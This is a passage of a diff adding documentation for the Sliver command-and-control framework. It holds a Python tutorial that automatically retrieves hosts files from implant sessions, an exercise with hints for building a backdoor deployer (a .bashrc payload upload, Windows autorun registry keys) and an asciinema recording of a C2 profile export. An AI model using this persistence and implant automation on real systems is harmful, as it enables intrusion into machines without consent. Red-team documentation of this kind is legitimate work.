"/Users/tester/tools/tester_127.0.0.1.cfg" + +In [3]: config = SliverClientConfig.parse_config_file(DEFAULT_CONFIG) + +In [4]: client = SliverClient(config) + +In [5]: await client.connect() +Out[5]: +Major: 1 +Minor: 5 +Patch: 37 +Commit: "0a43dc688ffb31a0a38511c47e8547a44a6918d4" +CompiledAt: 1681408237 +OS: "darwin" +Arch: "arm64" +``` + +From this point on we can use the client object to interact with the server, let’s start with listing any sessions or beacons that might be currently connected. + +```bash +In [6]: beacons = await client.beacons() + +In [7]: sessions = await client.sessions() + +In [8]: beacons +Out[8]: [] + +In [9]: sessions +Out[9]: +[ID: "f80ec897-0870-4f03-a1b1-364e5a0d243c" + Name: "UNEXPECTED_PORTER" + Hostname: "test.local" + UUID: "c6de1a44-016a-5fbe-b76a-da56af41316d" + Username: "tester" + UID: "501" + GID: "20" + OS: "darwin" + Arch: "amd64" + Transport: "http(s)" + RemoteAddress: "127.0.0.1:60218" + PID: 74773 + Filename: "/Users/tester/tools/UNEXPECTED_PORTER" + LastCheckin: 1683185925 + ActiveC2: "http://127.0.0.1" + ReconnectInterval: 60000000000 + PeerID: 4416183373589698218 + FirstContact: 1683185429] +``` + +To run commands on this session you’ll need to create an InteractiveSession object. + +```bash +In [10]: interract = await client.interact_session("f80ec897-0870-4f03-a1b1-364e5a0d243c") + +In [11]: await interract.pwd() +Out[11]: Path: "/Users/tester" +``` + +Now that we’ve got the basics of connecting to sliver and running commands down let’s write a more useful script that will display the hosts file when a new session checks in. Our goal is to first identify the Operating System, and then based on that retrieve and display the contents of the hosts file if it exists. Because this script will wait and react to events emitted by the Sliver server, we’re going to use `asyncio` to write our client. + +```bash +#!/usr/bin/env python3 + +import os +import asyncio +from sliver import SliverClientConfig, SliverClient +import gzip + +DEFAULT_CONFIG = "/Users/tester/tools/neo_127.0.0.1.cfg" + +async def main(): + ''' Client connect example ''' + config = SliverClientConfig.parse_config_file(DEFAULT_CONFIG) + client = SliverClient(config) + await client.connect() + + async for event in client.on('session-connected'): + print('Session %s just connected !' % event.Session.ID) + +if __name__ == '__main__': + loop = asyncio.get_event_loop() + loop.run_until_complete(main()) +``` + +As shown above we can access the session object through `event.Session`. Let’s go ahead and add a few conditions based on the operating system. + +```bash +if event.Session.OS == "darwin": + print('Session is running on macOS') + +elif event.Session.OS == "Linux": + print('Session is running on Linux') +elif event.Session.OS == "Windows" + print('Session is running on Windows') +else: + print('Session is running on %s', event.Session.OS) +``` + +Let’s setup an InteractiveSession object like previously. + +```bash +interact = await client.interact_session(event.Session.ID) +``` + +We’re going to start with writing the code for Linux and Macos, since in their case the file is located in the same place. First we check if the file exists, then we download and decompress it to display its contents using gzip. + +```bash +file_listing = await interact.ls("/etc/hosts") +if file_listing.Exists: + gzipFile = await interact.download("/etc/hosts") + contents = gzip.decompress(gzipFile.Data) + print('%r' % contents) +``` + +The code for Windows is relatively similar the only major difference being the file location. + +```bash +file_listing = await interact.ls("C:/Windows/System32/drivers/etc/hosts") +if file_listing.Exists: + gzipFile = await interact.download("C:/Windows/System32/drivers/etc/hosts") + contents = gzip.decompress(gzipFile.Data) + print('%r' % contents) +``` + +If we run our script and spin up a few sessions we should start to see hosts files being retrieved. + +```bash +python3.11 autocat.py +Automatically interacting with session 16338c85-b670-44ab-ac83-2df885654b07 +b"# Copyright (c) 1993-2009 Microsoft Corp.\r\n#\r\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\r\n#\r\n# ... + +Automatically interacting with session 93fcbab2-f00d-44a4-944a-e1ea8ec324e2 +b'##\n# Host Database\n#\n# localhost is used to configure the loopback interface\n# when the system is booting. Do not change this entry.\n##\n127.0.0.1... +``` + +As an exercise, build automated backdoor deployer which first identifies the target operating system and then deploys a corresponding backdoor, in the case of Linux or Macos you can backdoor a `.bashrc` file to run a previously uploaded binary in the background, in the case of Windows you can use the registry commands to deploy a new `autorun` key. + +Here are a couple hints: + +- Start with generating sliver implants for all your target systems, on implant connection you’ll want to upload them somewhere on disc +- In the cases of Linux and Macos you’ll want to download the `.bashrc` file, decompress and modify it locally before re-uploading it. The upload command should look like this `await interract.upload("/home/target/.bashrc", contents + b'\r\necho "pwned !"')`. +- For Windows you can look at the `registry_read` and `registry_create_key` functions. + +## References + +- [https://github.com/BishopFox/sliver/wiki/Writing-your-own-client](https://github.com/BishopFox/sliver/wiki/Writing-your-own-client) +- [https://sliverpy.readthedocs.io/en/latest/](https://sliverpy.readthedocs.io/en/latest/) +- [https://github.com/moloch--/sliver-py](https://github.com/moloch--/sliver-py) +- [https://github.com/moloch--/sliver-script](https://github.com/moloch--/sliver-script) diff --git a/docs/sliver-docs/public/asciinema/custom_c2profile.cast b/docs/sliver-docs/public/asciinema/custom_c2profile.cast new file mode 100644 index 0000000000..b020e4e93b --- /dev/null +++ b/docs/sliver-docs/public/asciinema/custom_c2profile.cast @@ -0,0 +1,503 @@ +{"version": 2, "width": 272, "height": 61, "timestamp": 1714659260, "env": {"SHELL": null, "TERM": "xterm"}} +[0.032816, "o", "# "] +[0.938981, "o", "."] +[0.985467, "o", "/"] +[1.198498, "o", "s"] +[1.306655, "o", "l"] +[1.395915, "o", "i"] +[1.477486, "o", "v"] +[1.578781, "o", "e"] +[1.697675, "o", "r"] +[1.869583, "o", "-"] +[2.029534, "o", "s"] +[2.068227, "o", "e"] +[2.163221, "o", "r"] +[2.366974, "o", "v"] +[2.483838, "o", "e"] +[2.57549, "o", "r"] +[2.674361, "o", "\r\n"] +[3.801485, "o", "\u001b[32m\r\r\n ███████╗██╗ ██╗██╗ ██╗███████╗██████╗\r\r\n ██╔════╝██║ ██║██║ ██║██╔════╝██╔══██╗\r\r\n ███████╗██║ ██║██║ ██║█████╗ ██████╔╝\r\r\n ╚════██║██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗\r\r\n ███████║███████╗██║ ╚████╔╝ ███████╗██║ ██║\r\r\n ╚══════╝╚══════╝╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝\r\r\n\u001b[0m\r\nAll hackers gain renown\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mServer v1.5.39 - ba3893980d1ca5e4ae4089eb4c87e9f5ba389119 - \u001b[1mDirty\u001b[0m\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mWelcome to the sliver shell, please type 'help' for options\r\r\n"] +[3.805318, "o", "\r\n"] +[3.8316, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[3.833714, "o", "\u001b[1 q"] +[3.835817, "o", "\u001b[?25l"] +[3.836612, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[3.837224, "o", "\u001b[6n"] +[3.840015, "o", "\u001b[0m\u001b[0K\u001b[49m"] +[3.840101, "o", "\r\r\n"] +[3.840672, "o", "\u001b[0K"] +[3.840882, "o", "\u001b[0J\u001b[272D\u001b[1A"] +[3.841088, "o", "\u001b[9D\u001b[9C"] +[3.841713, "o", "\u001b[272D\u001b[9C\u001b[?25h"] +[4.303647, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[4.306327, "o", "\u001b[6n"] +[4.318244, "o", "c\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D"] +[4.320693, "o", "\u001b[1A\u001b[10D\u001b[9C\u001b[272D\u001b[10C\u001b[?25h"] +[4.520626, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[4.532409, "o", "c2\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[11D\u001b[9C\u001b[272D\u001b[11C\u001b[?25h"] +[4.791039, "o", "\u001b[?25l"] +[4.791552, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[4.79912, "o", "c2p\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[4.799739, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[12D\u001b[9C\u001b[272D\u001b[12C\u001b[?25h"] +[4.894404, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[4.900902, "o", "c2pr\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A"] +[4.901711, "o", "\u001b[13D\u001b[9C\u001b[272D\u001b[13C\u001b[?25h"] +[4.993115, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.013218, "o", "c2pro\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[14D\u001b[9C\u001b[272D\u001b[14C\u001b[?25h"] +[5.114605, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.133834, "o", "c2prof\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[5.134762, "o", "\u001b[272D\u001b[1A\u001b[15D\u001b[9C\u001b[272D\u001b[15C\u001b[?25h"] +[5.211061, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.223123, "o", "c2profi\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[5.223581, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[16D\u001b[9C\u001b[272D\u001b[16C\u001b[?25h"] +[5.289935, "o", "\u001b[?25l\u001b[272D"] +[5.291987, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.300907, "o", "c2profil\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A"] +[5.302069, "o", "\u001b[17D\u001b[9C\u001b[272D\u001b[17C\u001b[?25h"] +[5.332256, "o", "\u001b[?25l\u001b[272D"] +[5.332755, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.339849, "o", "c2profile\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[5.341086, "o", "\u001b[272D\u001b[1A\u001b[18D\u001b[9C\u001b[272D\u001b[18C\u001b[?25h"] +[5.389029, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[5.390688, "o", "\u001b[6n"] +[5.396701, "o", "\u001b[1m\u001b[32mc2profiles\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[5.396869, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[19D\u001b[9C\u001b[272D\u001b[19C\u001b[?25h"] +[5.516542, "o", "\u001b[?25l"] +[5.53115, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.537208, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D"] +[5.537737, "o", "\u001b[1A\u001b[20D\u001b[9C\u001b[272D\u001b[20C\u001b[?25h"] +[6.697572, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.71869, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22me\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A"] +[6.721034, "o", "\u001b[21D\u001b[9C\u001b[272D\u001b[21C\u001b[?25h"] +[6.877095, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.889959, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mex\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[6.891807, "o", "\u001b[272D\u001b[1A\u001b[22D\u001b[9C\u001b[272D\u001b[22C\u001b[?25h"] +[7.017006, "o", "\u001b[?25l"] +[7.018407, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.027881, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexp\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[7.030167, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[23D\u001b[9C\u001b[272D\u001b[23C\u001b[?25h"] +[7.059124, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[7.05968, "o", "\u001b[6n"] +[7.065781, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexpo\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[7.067786, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[24D\u001b[9C\u001b[272D\u001b[24C\u001b[?25h"] +[7.22245, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.238734, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexpor\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[7.241667, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[25D\u001b[9C\u001b[272D\u001b[25C\u001b[?25h"] +[7.335184, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.342802, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[7.344413, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[26D\u001b[9C\u001b[272D\u001b[26C\u001b[?25h"] +[7.441901, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.45158, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[27D\u001b[9C\u001b[272D\u001b[27C\u001b[?25h"] +[8.047779, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.069437, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[8.070579, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[28D\u001b[9C\u001b[272D\u001b[28C\u001b[?25h"] +[8.364177, "o", "\u001b[?25l\u001b[272D"] +[8.364744, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.371014, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-h\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r"] +[8.371233, "o", "\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[29D\u001b[9C\u001b[272D\u001b[29C\u001b[?25h"] +[8.723197, "o", "\u001b[29D\u001b[9C"] +[8.723881, "o", "\u001b[6n"] +[8.731097, "o", "\u001b[272D\u001b[29C\u001b[0J\u001b[272D\r\r\n"] +[8.735797, "o", "\u001b[0 q"] +[8.737844, "o", "\r\n"] +[8.756828, "o", "Export HTTP C2 profile\r\n\r\n"] +[8.764575, "o", "Usage:\r\n c2profiles export [flags]\r\n\r\nFlags:\r\n -f, --file string Path to file to export C2 configuration to\r\n -h, --help help for export\r\n -n, --name string HTTP C2 Profile name (default \"default\")\r\n"] +[8.765484, "o", "\r\n"] +[8.788535, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[8.789174, "o", "\u001b[1 q\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.791716, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[9D\u001b[9C"] +[8.79195, "o", "\u001b[272D\u001b[9C\u001b[?25h"] +[9.813154, "o", "\u001b[?25l"] +[9.814247, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[9.833167, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-h\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[9.835856, "o", "\u001b[272D\u001b[1A\u001b[29D\u001b[9C\u001b[272D\u001b[29C\u001b[?25h"] +[10.573182, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[10.574022, "o", "\u001b[6n"] +[10.592491, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[10.594246, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[28D\u001b[9C\u001b[272D\u001b[28C\u001b[?25h"] +[11.366893, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.385557, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-f\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[29D\u001b[9C\u001b[272D"] +[11.388938, "o", "\u001b[29C\u001b[?25h"] +[11.545758, "o", "\u001b[?25l"] +[11.549911, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.561053, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[11.563741, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[30D\u001b[9C\u001b[272D\u001b[30C\u001b[?25h"] +[11.882926, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.903972, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22md\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[11.904256, "o", "\u001b[0J\u001b[272D\u001b[1A\u001b[31D\u001b[9C\u001b[272D\u001b[31C\u001b[?25h"] +[11.943583, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[11.943795, "o", "\u001b[6n"] +[11.950851, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mde\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[32D\u001b[9C\u001b[272D\u001b[32C\u001b[?25h"] +[12.093835, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[12.107646, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdef\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[12.109905, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[33D\u001b[9C\u001b[272D\u001b[33C\u001b[?25h"] +[12.209746, "o", "\u001b[?25l"] +[12.213819, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[12.229556, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefa\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[34D\u001b[9C\u001b[272D\u001b[34C\u001b[?25h"] +[12.31973, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[12.324946, "o", "\u001b[6n"] +[12.335256, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefau\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[12.337214, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[35D\u001b[9C\u001b[272D\u001b[35C\u001b[?25h"] +[12.363598, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[12.365699, "o", "\u001b[6n"] +[12.373131, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefaul\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[12.374193, "o", "\u001b[0J\u001b[272D\u001b[1A\u001b[36D\u001b[9C\u001b[272D\u001b[36C\u001b[?25h"] +[12.450096, "o", "\u001b[?25l\u001b[272D"] +[12.451101, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[12.458408, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[37D\u001b[9C\u001b[272D\u001b[37C\u001b[?25h"] +[12.759097, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[12.773543, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[38D\u001b[9C\u001b[272D\u001b[38C\u001b[?25h"] +[12.932706, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[12.940468, "o", "\u001b[6n"] +[12.949837, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[12.950132, "o", "\u001b[272D\u001b[1A\u001b[39D\u001b[9C\u001b[272D\u001b[39C\u001b[?25h"] +[13.136808, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[13.154631, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A"] +[13.155923, "o", "\u001b[40D\u001b[9C\u001b[272D\u001b[40C\u001b[?25h"] +[13.337861, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[13.356646, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2p\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[41D\u001b[9C\u001b[272D\u001b[41C\u001b[?25h"] +[13.470467, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[13.485656, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2pr\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[13.488122, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[42D\u001b[9C\u001b[272D\u001b[42C\u001b[?25h"] +[13.56382, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[13.568935, "o", "\u001b[6n"] +[13.576791, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2pro\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[13.577042, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[43D\u001b[9C\u001b[272D\u001b[43C\u001b[?25h"] +[13.697149, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[13.715325, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2prof\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[44D"] +[13.716648, "o", "\u001b[9C\u001b[272D\u001b[44C\u001b[?25h"] +[13.760933, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[13.762775, "o", "\u001b[6n"] +[13.771378, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2profi\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[13.773973, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[45D\u001b[9C\u001b[272D\u001b[45C\u001b[?25h"] +[13.824571, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[13.825891, "o", "\u001b[6n"] +[13.834916, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2profil\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[46D\u001b[9C"] +[13.836196, "o", "\u001b[272D\u001b[46C\u001b[?25h"] +[13.921852, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[13.934932, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mexport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2profile\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[13.93566, "o", "\u001b[272D\u001b[1A\u001b[47D\u001b[9C\u001b[272D\u001b[47C\u001b[?25h"] +[14.916087, "o", "\u001b[47D\u001b[9C\u001b[6n"] +[14.938174, "o", "\u001b[272D\u001b[47C\u001b[0J\u001b[272D\r\r\n"] +[14.945767, "o", "\u001b[0 q\r\n"] +[14.96874, "o", "\u001b7"] +[14.968932, "o", "\u001b[?25l"] +[14.969801, "o", "\u001b8\u001b[0G\u001b[2K"] +[14.978986, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a c2 profile\u001b[0m \u001b[0;36m[Use arrows to move, type to filter]\u001b[0m\r\n\u001b[0;1;36m> default\u001b[0m\r\n\u001b[0;39m ruby\u001b[0m\r\n"] +[14.979738, "o", "\u001b7"] +[14.983027, "o", "\u001b[1A"] +[14.983154, "o", "\u001b[0G\u001b[1A\u001b[0G"] +[15.557864, "o", "\u001b8\u001b[?25h\u001b8"] +[15.558923, "o", "\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K"] +[15.559016, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a c2 profile\u001b[0m\u001b[0;36m default\u001b[0m\r\n"] +[15.605808, "o", "defaultC2 profile exported to default_c2profile\r\n\r\n"] +[15.616357, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[15.616489, "o", "\u001b[1 q\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[15.616952, "o", "\u001b[6n"] +[15.619739, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[9D\u001b[9C\u001b[272D\u001b[9C\u001b[?25h"] +[16.802261, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[16.818936, "o", "e\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[16.819924, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[10D\u001b[9C\u001b[272D\u001b[10C\u001b[?25h"] +[17.029573, "o", "\u001b[?25l"] +[17.032519, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[17.041941, "o", "ex\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A"] +[17.042239, "o", "\u001b[11D\u001b[9C\u001b[272D\u001b[11C\u001b[?25h"] +[17.202384, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[17.221738, "o", "exi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[12D\u001b[9C\u001b[272D\u001b[12C\u001b[?25h"] +[17.387826, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[17.393474, "o", "\u001b[6n"] +[17.403537, "o", 